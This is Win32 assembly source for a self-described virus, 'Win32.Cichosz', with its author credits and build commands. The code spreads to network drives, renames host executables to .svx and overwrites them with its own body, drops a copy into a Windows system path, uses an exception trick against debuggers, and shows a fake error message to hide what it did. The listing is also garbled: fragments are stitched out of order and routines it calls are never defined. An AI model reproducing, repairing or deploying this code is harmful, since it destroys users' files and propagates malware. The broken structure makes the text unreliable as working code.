;============================================================ ;=== Win32.Cichosz virus. Coded by Necronomikon[ShadowvX] === ;============================================================ ;Virusname: Win32.Cichosz ;Author: Necronomikon ;Date:26-12-00 ;Features: - Worming: It checks all drives and if it have access to ;a network drive,it infect there some files. (thanks to SnakeByte) ; - Fuck Debuggers ; - Display MessageBox ; - Renames infected files to svx ;--------------------------------------- ;--- based on Win32.3x3 by BumbleBee --- ;--------------------------------------- ;====================================================== ; . To compile: ; ; tasm32 /ml /m3 cichosz,,; ; tlink32 -Tpe -c cichosz,cichosz,, import32.lib ;======================================================= .386 locals jumps .model flat,STDCALL extrn ExitProcess:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn FindClose:PROC extrn GetCommandLineA:PROC extrn MoveFileA:PROC extrn CopyFileA:PROC extrn WinExec:PROC extrn MessageBoxA:PROC extrn GetSystemTime:PROC extrn CloseHandle:PROC extrn GetFileSize:PROC extrn GetCurrentDirectoryA:PROC extrn SetCurrentDirectoryA:PROC extrn DeleteFileA:PROC L equ .DATA szTitle db "Structured Exception Handler example",0 szMessage db "Intercepted General Protection Fault!",0 .code start: call setupSEH ; The call pushes the offset ; past it in the stack rigth? ; So we will use that :) exceptionhandler: mov esp,[esp+8] ; Error gives us old ESP ; in [ESP+8] push 00000000h ; Parameters for MessageBoxA push offset szTitle push offset szMessage push 00000000h call MessageBoxA push 00000000h call ExitProcess ; Exit Application setupSEH: push dword ptr fs:[0] ; Push original SEH handler mov fs:[0],esp ; And put the new one (located ; after the first call) mov ebx,0BFF70000h ; Try to write in kernel (will mov eax,012345678h ; generate an exception) xchg eax,[ebx] end start windoze db 'C:\Windows\System\Sys\Porn.exe',0 fHnd dd ? ; handle for files shit dd 0 ; for write process cont0 dd 0 ; for loops cont1 db 0 ; for loops findData db 316 dup(0) ; data for ffirst and fnext fMask db '*.EXE' ; mask for finding exe files ffHnd dd ? ; handle for ffirst and fnext hostName db 260 dup(0) ; space for save host name hwoArgs db 260 dup(0) ; host without arguments futureHostName db 260 dup(0) ; space for save new host name chDir db 260 dup(0) ; space for save current dir commandLine dd ? ; handle for command line sysTimeStruct db 16 dup(0) ; space for system time struct ; virus id and author virusId db 'Win32.CICHOSZ coded by Necronomikon',0 ; message mess db 'This is my 1st Win32-Virus.' db 0dh,0ah,'Greetingz tha whole ShadowvX Group!',0 bmess db 'Invalid call in shared memory 0x0cf689000.',0 ;-------------------- push offset Buffer ; offset of the buffer push 60h ; buffer-lenght call GetLogicalDriveStrings cmp eax, 0 ; did we fail ? je StopThis lea esi, Buffer WhatDrive: push esi call GetDriveType cmp eax, DRIVE_REMOTE ; we got a network drive jne NoNetwork ; esi still contains the offset of ; the root dir on the drive call infectDrive ; so we infect it.. ;P NoNetwork: Call GetNextZero ; place esi after the next zero ; ( searching from esi onwards ) cmp byte ptr [esi],0 jne WhatDrive ; if we searched all drives we ; end here, otherwise we check the type StopThis: ret Buffer db 60h dup (?) ; I don't know that many ppl with 20+ ; Drives so this buffersize should be ; big enough ;) ;---------------------------------------- virus: lea eax,sysTimeStruct ; check for payload push eax call GetSystemTime ; get system time lea eax,sysTimeStruct cmp word ptr [eax+2],12 jne skipPay cmp word ptr [eax+6],14 jne skipPay push L 1030h ; show a message box lea eax,virusId push eax lea eax,mess push eax push L 0 call MessageBoxA skipPay: call GetCommandLineA ; get command line mov dword ptr [commandLine],eax xor esi,esi ; copy it to get host path lea edi,hostName ; needed for infection process copyLoop: mov bl,byte ptr [eax+esi] mov byte ptr [edi+esi],bl cmp bl,0 je skipArgs inc esi jmp copyLoop skipArgs: ; copy host name without args xor esi,esi lea edi,hwoArgs lea eax,hostName copyLoopb: mov bl,byte ptr [eax+esi] mov byte ptr [edi+esi],bl cmp bl,'.' je ffirst inc esi jmp copyLoopb ffirst: mov dword ptr [edi+esi],'EXE.' ; add extension ; now we have arguments in ; hostName and name only in ; hwoArgs push 0 lea eax,windoze push eax lea eax,hwoArgs push eax call CopyFileA ; install in windows dir lea eax,chDir push eax ; get current directory push 260 call GetCurrentDirectoryA cmp eax,0 retDir: lea eax,chDir push eax ; restore work directory call SetCurrentDirectoryA fnext: call infectFile skipThis: lea eax,findData push eax push dword ptr [ffHnd] call FindNextFileA ; find next *.EXE cmp eax,0 jne fnext push dword ptr [ffHnd] call FindClose ; close ffist/fnext handle execHost: xor esi,esi ; copy hostName to future host Name lea edi,futureHostName lea eax,hostName copyLoop2: mov bl,byte ptr [eax+esi] mov byte ptr [edi+esi],bl cmp bl,'.' je contExec inc esi jmp copyLoop2 contExec: mov dword ptr [edi+esi],'svx.' ; change ext to svx push 1 push edi call WinExec ; exec host cmp eax,32 ; exec error? jb lastOptionStealth ; je stealth with lame message goOut: push L 0h call ExitProcess ; exit program infectFile: xor esi,esi ; copy file found name to lea edi,futureHostName ; future host name lea eax,findData add eax,44 icopyLoop: mov bl,byte ptr [eax+esi] mov byte ptr [edi+esi],bl cmp bl,'.' je continueInf inc esi jmp icopyLoop continueInf: mov dword ptr [edi+esi],'svx.' ; change ext to svx push eax push edi push eax call MoveFileA ; rename the host to *.svx pop eax push 0 push eax lea eax,hwoArgs push eax call CopyFileA ; copy current host to new host ; (virus body) ret lastOptionStealth: ; lame mess when we can't exec host push L 1010h ; user can think the program is push L 0h ; corrupted or windows goes lea eax,bmess ; wrong (very common =] ) push eax push L 0 call MessageBoxA jmp goOut dcLoop: push L 0 lea eax,shit push eax push L 1 push edi push dword ptr [fHnd] cmp byte ptr [edi],0ffh jne skipFF dec dword ptr [cont0] call addFF inc edi skipFF: inc edi dec dword ptr [cont0] cmp dword ptr [cont0],0 jne dcLoop push dword ptr [fHnd] ; close file call CloseHandle addFF: xor ecx,ecx mov cl,byte ptr [edi+1] mov byte ptr [cont1],cl cmp cl,0 jne addFFLoop ret addFFLoop: push L 0 lea eax,shit push eax push L 1 push edi push dword ptr [fHnd] dec byte ptr [cont1] cmp byte ptr [cont1],0 jne addFFLoop ret Ends End virus